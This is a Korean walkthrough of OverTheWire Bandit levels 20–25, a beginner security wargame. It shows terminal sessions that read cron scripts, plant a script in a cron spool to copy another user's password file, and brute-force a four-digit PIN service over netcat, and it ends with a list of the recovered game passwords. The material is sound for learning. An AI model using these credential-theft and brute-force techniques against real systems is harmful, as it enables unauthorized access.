bandit 20-29
#
level 20 > 21 :
이 프로그램은 TCP를 사용하여 로컬 호스트의 지정된 포트에 연결합니다. 상대방으로부터 정확한 비밀번호를 받으면 다음 비밀번호가 다시 전송됩니다.
```
bandit20@bandit:~$ ls
suconnect
bandit20@bandit:~$ ./suconnect
Usage: ./suconnect <portnumber>
This program will connect to the given port on localhost using TCP. If it receives the correct password from the other side, the next password is transmitted back.
```
터미널 하나 더 열어서 임의의 port를 listen하고 비밀번호를 입력

terminal1
```
bandit20@bandit:~$ nc -l -p 12345
GbKksEFF4yrVs6il55v6gwY5aVje5f0j
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr
```
terminal2
```
bandit20@bandit:~$ ./suconnect 12345
Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Password matches, sending next password
```
level 21 > 22 : /etc/cron.d 에서 시간기반작업 스케쥴러가 일정시간마다 작동하고 있다.
```
bandit21@bandit:/etc/cron.d$ ls
cronjob_bandit15_root  cronjob_bandit17_root  cronjob_bandit22  cronjob_bandit23  cronjob_bandit24  cronjob_bandit25_root
bandit21@bandit:/etc/cron.d$ cat cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
bandit21@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@bandit:/etc/cron.d$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
```
level 22 > 23 :
```
bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh 
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@bandit:/etc/cron.d$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349
bandit22@bandit:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
```
level 23 > 24 : shell 작성

앞에 거 반복
```
bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done

```
![image](https://user-images.githubusercontent.com/61821641/148028181-d084228b-ce1e-4121-a174-2f42174af921.png)
[출처](https://jiravvit.tistory.com/entry/OverTheWire-Bandit-level23-level24)

1. 셸이 실행되고 삭제될때마다 작성하기 싫으니까 디렉토리와 파일을 생성하고 사본을 만들자(/tmp/mydir24/mysh24.sh)
```
bandit23@bandit:/tmp$ mkdir mydir24
bandit23@bandit:/tmp$ cd mydir24
bandit23@bandit:/tmp/mydir24$ nano mysh24.sh
Unable to create directory /home/bandit23/.nano: Permission denied
It is required for saving/loading search history or cursor positions.

Press Enter to continue

bandit23@bandit:/tmp/mydir24$ cat mysh24.sh
cat /etc/bandit_pass/bandit24 > /tmp/mydir24/rst.txt
```
2. 셸이 실행되려면 다음 권한이 필요하다.
- /var/spool/bandit24가 /tmp/mydir24에 write 권한
- /tmp/mydir24/mysh24.sh에 read권한
```
bandit23@bandit:/tmp/mydir24$ ls -la .
total 1996
drwxr-sr-x 2 bandit23 root    4096 Jan  4 08:51 .
drwxrws-wt 1 root     root 2031616 Jan  4 08:56 ..
-rw-r--r-- 1 bandit23 root      53 Jan  4 08:51 mysh24.sh
```
/tmp/mydir24에 other에게 write 권한을 부여
```
bandit23@bandit:/tmp/mydir24$ chmod o+w .
```
/tmp/mydir24/mysh24.sh에 777권한 부여
```
bandit23@bandit:/tmp/mydir24$ chmod 777 mysh24.sh
```
3. 셸을 실행해보자(1분 기댜려야됨)
```
bandit23@bandit:/tmp/mydir24$ cp mysh24.sh /var/spool/bandit24
bandit23@bandit:/tmp/mydir24$ ls
mysh24.sh  rst.txt
bandit23@bandit:/tmp/mydir24$ cat rst.txt
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
```
level 24 > 25 : 저는 유저 밴디트25의 핀코드 체커입니다. 사용자 밴디트24의 암호와 비밀 핀코드를 한 줄에 공백으로 구분하여 입력하십시오.

pine code를 구해야됨 >> brute force
```
bandit24@bandit:~$ nmap -sT localhost -p 30002

Starting Nmap 7.40 ( https://nmap.org ) at 2022-01-04 09:17 CET
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00015s latency).
PORT      STATE SERVICE
30002/tcp open  pago-services2

Nmap done: 1 IP address (1 host up) scanned in 0.05 seconds
bandit24@bandit:~$ nc 127.0.0.1 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
```
1. brute force에 쓸 shell을 작성해보자
```
#!/bin/bash
password24=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

for i in {0000..9999}
        do
                echo $password24 $i >> passlist.txt
        done
```
2. 권한 주고 실행해서 만든 파일로 brute force
```
bandit24@bandit:/tmp/mydir25$ chmod 777 my_pincode.sh
bandit24@bandit:/tmp/mydir25$ ./my_pincode.sh
bandit24@bandit:/tmp/mydir25$ ls
my_pincode.sh  passlist.txt

bandit24@bandit:/tmp/mydir25$ cat passlist.txt | nc localhost 30002

Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

Exiting.

```
level 25 > 26 :
```
bandit25@bandit:~$ cat /etc/passwd | grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh

export TERM=linux

more ~/text.txt
exit 0
```
![image](https://user-images.githubusercontent.com/61821641/148034683-13fecd1b-b01d-459f-8fef-9515e242024e.png)
#
명령어 정리
```
nc -l -p PORT
cat PASSWORD_LIST.TXT | nc IP PORT
```
#
password
```
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
```
#
